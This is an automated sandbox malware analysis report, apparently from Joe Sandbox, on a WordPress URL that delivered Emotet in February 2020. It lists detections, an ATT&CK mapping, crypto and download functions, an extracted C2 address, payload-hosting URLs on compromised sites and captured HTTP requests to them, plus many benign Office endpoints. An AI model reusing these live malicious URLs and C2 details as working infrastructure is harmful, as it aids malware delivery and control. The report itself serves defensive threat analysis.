Loading ...

Play interactive tourEdit tour

Analysis Report https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:205759
Start date:04.02.2020
Start time:19:04:31
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.win@13/22@3/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 64.3% (good quality ratio 62.1%)
  • Quality average: 83.6%
  • Quality standard deviation: 24.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 45
  • Number of non-executed functions: 457
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 52.109.88.38, 52.109.124.24, 52.109.120.23, 52.109.88.39, 13.107.3.128, 13.107.5.88, 52.109.32.27, 52.109.8.19, 13.88.28.53, 67.27.150.254, 8.247.210.254, 67.26.109.254, 8.238.20.254, 8.238.23.254, 72.21.81.240, 67.27.234.126, 67.27.233.126, 8.248.141.254, 8.253.95.121, 8.241.9.126, 93.184.221.240, 67.27.157.126, 67.26.75.254, 8.241.9.254, 8.248.129.254, 67.27.158.254, 13.107.4.50, 67.27.158.126, 8.248.127.254, 8.247.209.254, 8.238.24.126, 67.24.35.254, 8.248.5.254
  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, prd.col.aria.mobile.skypedata.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, auto.au.download.windowsupdate.com.c.footprint.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, config.edge.skype.com, pipe.cloudapp.aria.akadns.net, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, s-0001.s-msedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, prod.nexusrules.live.com.akadns.net, afdap.au.au-msedge.net, au.au-msedge.net, pipe.skype.com, config.officeapps.live.com, au.c-0001.c-msedge.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation11Hidden Files and Directories1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1System Time Discovery2Remote File Copy4Input Capture1Data Encrypted11Commonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaPowerShell4Valid Accounts1Access Token Manipulation1Scripting1Network SniffingSecurity Software Discovery11Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting1Modify Existing Service11Process Injection11Obfuscated Files or Information2Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API121New Service2New Service2Masquerading231Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessHidden Files and Directories1Account ManipulationSystem Information Discovery39Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol5Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkCommand-Line Interface112Modify Existing ServiceNew ServiceValid Accounts1Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentService Execution12Path InterceptionScheduled TaskVirtualization/Sandbox Evasion2Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryApplication Window Discovery11Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection11Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://home.mu4viet.net/wp-includes/hddg0/Avira URL Cloud: Label: malware
Source: https://bigdataprofile.com/d8bhg/7mf/Google Safe Browsing: Label: phishing
Source: http://demo.tuzlapaslanmaz.com/wp-admin/sj33/Avira URL Cloud: Label: malware
Found malware configurationShow sources
Source: driverthunk.exe.5872.14.memstrMalware Configuration Extractor: Emotet {"C2 list": ["209.146.22.34/cZ0e2Pg5vIvmxy2"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\546.exeVirustotal: Detection: 9%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Desktop\download\O_45870184.rtfJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,14_2_00F8207B
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,14_2_00F81FFC
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,14_2_00F81F75
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81F11 CryptExportKey,14_2_00F81F11
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F8215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,14_2_00F8215A
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81F56 CryptGetHashParam,14_2_00F81F56

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00442282 lstrlenA,FindFirstFileA,FindClose,11_2_00442282
Source: C:\Users\user\546.exeCode function: 12_2_00442282 lstrlenA,FindFirstFileA,FindClose,12_2_00442282
Source: C:\Users\user\546.exeCode function: 12_2_004417BA __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,12_2_004417BA

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.6:49881 -> 209.146.22.34:443
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /wp-includes/hddg0/ HTTP/1.1Host: home.mu4viet.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/sj33/ HTTP/1.1Host: demo.tuzlapaslanmaz.comConnection: Keep-Alive
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 70.187.114.147
Source: unknownTCP traffic detected without corresponding DNS query: 70.187.114.147
Source: unknownTCP traffic detected without corresponding DNS query: 70.187.114.147
Source: unknownTCP traffic detected without corresponding DNS query: 209.146.22.34
Source: unknownTCP traffic detected without corresponding DNS query: 209.146.22.34
Source: unknownTCP traffic detected without corresponding DNS query: 209.146.22.34
Source: unknownTCP traffic detected without corresponding DNS query: 209.146.22.34
Source: unknownTCP traffic detected without corresponding DNS query: 209.146.22.34
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81383 InternetReadFile,14_2_00F81383
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wp-includes/hddg0/ HTTP/1.1Host: home.mu4viet.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/sj33/ HTTP/1.1Host: demo.tuzlapaslanmaz.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: wentworthfallspots.com.au
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /cZ0e2Pg5vIvmxy2 HTTP/1.1Referer: http://209.146.22.34/cZ0e2Pg5vIvmxy2Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 209.146.22.34:443Content-Length: 662Connection: Keep-AliveCache-Control: no-cache
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Feb 2020 18:06:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://home.mu4viet.net/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=5, max=150Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 62 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 76 69 22 20 2f 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 68 6f 6d 65 2e 6d 75 34 76 69 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 4d 55 34 56 69 65 74 2f 63 73 73 2f 68 6f 6d 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 65 74 20 6d 61 6b 65 20 79 6f 75 72 20 64 72 65 61 6d 20 63 6f 6d 65 20 74 72 75 65 21 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 68 6f 6d 65 2e 6d 75 34 76 69 65 74 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 4d 55 34 56 69 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 09 3c 21 2d 2d 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 47 6f 6f 67 6c 65 46 6f 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 25 33 41 33 30 30 25 32 43 33 30 30 69 25 32 43 34 30 30 25 32 43 35 30 30 25 32 43 36 30 30 25 32 43 37 30 30 25 32 43 38 30 30 25 37 43 52 6f 62 6f 74 6f 25 33 41 33 30 30 25 32 43 33 30 30 69 25 32 43 34 30 30 25 32 43 34 30 30 69 25 32 43 35 30 30 25 32 43 35 30 30 69 25 32 43 37 30 30 25 32 43 37 30 30 69 26 61 6d 70 3b 73 75 62 73 65 74 3d 76 69 65 74 6e 61 6d 65 73 65 26 61 6d 70 3b 76 65 72 3d 31 35 34 36 34 33 32 31 35 39 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 2d 2d 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 68 6f 6d 65 2e 6d 75 34 76 69 65 74 2
Urls found in memory or binary dataShow sources
Source: driverthunk.exe, 0000000E.00000002.4732324935.000000000019B000.00000004.00000001.sdmpString found in binary or memory: http://209.146.22.34/cZ0e2Pg5vIvmxy2
Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.drString found in binary or memory: http://coalitionbay.com/nysri/iiI/
Source: wget.exe, 00000002.00000002.4302546803.0000000000F4E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: wget.exe, 00000002.00000002.4302546803.0000000000F4E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.drString found in binary or memory: http://demo.tuzlapaslanmaz.com/wp-admin/sj33/
Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.drString found in binary or memory: http://home.mu4viet.net/wp-includes/hddg0/
Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com
Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.aadrm.com/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.diagnostics.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.onedrive.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://augloop.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.drString found in binary or memory: https://bigdataprofile.com/d8bhg/7mf/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cdn.entity.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://clients.config.office.net/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://config.edge.skype.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://cr.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://devnull.onenote.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://directory.services.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://graph.ppe.windows.net
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://graph.windows.net
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://graph.windows.net/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt.6.drString found in binary or memory: https://jebkhata.com/wp-includes/8l8yd7/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://lifecycle.office.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://login.microsoftonline.com/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://login.windows.local
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://management.azure.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://management.azure.com/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://messaging.office.com/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ncus-000.contentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://officeapps.live.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://onedrive.live.com
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
